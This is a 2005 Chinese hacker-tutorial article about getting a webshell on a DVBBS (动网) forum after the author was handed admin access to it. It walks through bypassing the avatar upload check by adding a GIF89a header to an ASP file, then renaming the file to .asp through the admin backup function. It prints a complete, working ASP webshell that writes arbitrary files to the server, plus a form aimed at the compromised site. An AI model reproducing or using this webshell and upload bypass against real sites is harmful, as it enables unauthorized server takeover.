动网后台也可以这样玩---黑色反击安全在线http://www.hf110.com

您现在的位置：黑色反击 >> 技术资讯 >> 黑客教程 >> 黑客教学 >> 正文

动网后台也可以这样玩

时间：2005-4-9 4:02:57 出处：火狐作者：9xiao 编辑：mervin 点击数：

【收藏到ViVi】【收藏到YouNote】【收藏此页到365Key】【收藏此页到bbmao】【狐摘】

今天下午powers群有个伙计给了偶个动网论坛的后台权限，问偶能否拿个webshell，进后台后，就准备备份数据库拿webshell，发现论坛版块

的上传权限没有打开，开了之后，用管理员id发贴上传，*，上传文件被删，接着从头像上传入手，发现asp后缀改为gif一样提示类型不对

，于是放弃上传的思路，想想论坛还有什么数据库，忽然想到data文件夹有个ip数据库，看来有些希望了，在ip地址管理把最小马插入，备份

为.asp后，竟然提示，Microsoft VBScript 编译器错误错误 '800a0408' 无效字符

bbs/9xiao.asp，行 3706

鐰^txQ
失败了，郁闷了好半天，想到4月1号的时候测试fox.wrsky.com动网7.1的后台备份时候比7.0多了个验证备份文件是否mdb数据库的提示，当时

首先就想到了把最小马插到一个数据库后，改gif后缀上传后再后台备份asp后缀，结果实验成功。7.0的在备份的时候没有检测要备份的文件类

型，偶想到了站上其他目录，把几个关键的.asp文件备份成gif后缀，在ie浏览中拿到了这个站上的dns的数据库，下来看是admin是md5加密，

偶一向是不主张暴力破解，觉得还是回到上传头像这，接了几个业务电话，思路逐渐清晰了些，想起了昨天和firefox在演示某个站的上传，后

缀不改只是在第一行加了GIF89a 这是gif的特征码，呵呵有门了一定可以突破头像上传那端验证；呵呵＊起那个有名的写asp的webshell，在第

一行加上GIF89a，改后缀.gif，用管理员id上传了头像，在论坛根目录备份了9xiao.asp，浏览器浏览下，郁闷撒怎么显示了红X，用网际快车

把它下来来，用记事本打开<form action='' method=post>保存文件的<font

color=red>绝对路径(包括文件名:如D:\web\x.asp):</font><input type=text name=syfdpath width=32

size=50><br>本文件绝对路径d:\*******\web*****\www\bbs\9xiao.asp<br>输入马的内容:<textarea name=cyfddata cols=80 rows=10

width=32></textarea><input type=submit

value=保存></form>改成.html好熟悉的界面撒，保存文件的绝对路径(包括文件名:如D:\web\x.asp):
本文件绝对路径d:\*******\web*****\www\bbs\9xiao.asp
代码应该是执行了，在<form action='' method=post>中''中输入9xiao.asp的url，保存文件的绝对路径(包括文件名:如D:\web\x.asp):框输

入d:\*******\web*****\www\bbs\9xiao2.asp 马的内容输入“火狐，你好！”点下提交，浏览下呵呵。

以下是代码：

GIF89a
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>

以下是代码：

<form action='http://www.****.net/bbs/9xiao.asp' method=post>保存文件的<font

color=red>绝对路径(包括文件名:如D:\web\x.asp):</font><input type=text name=syfdpath width=32

size=50><br>本文件绝对路径d:\virtualhost\web79354\www\bbs\9xiao.asp<br>输入马的内容:<textarea name=cyfddata cols=80 rows=10

width=32></textarea><input type=submit value=保存></form>

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】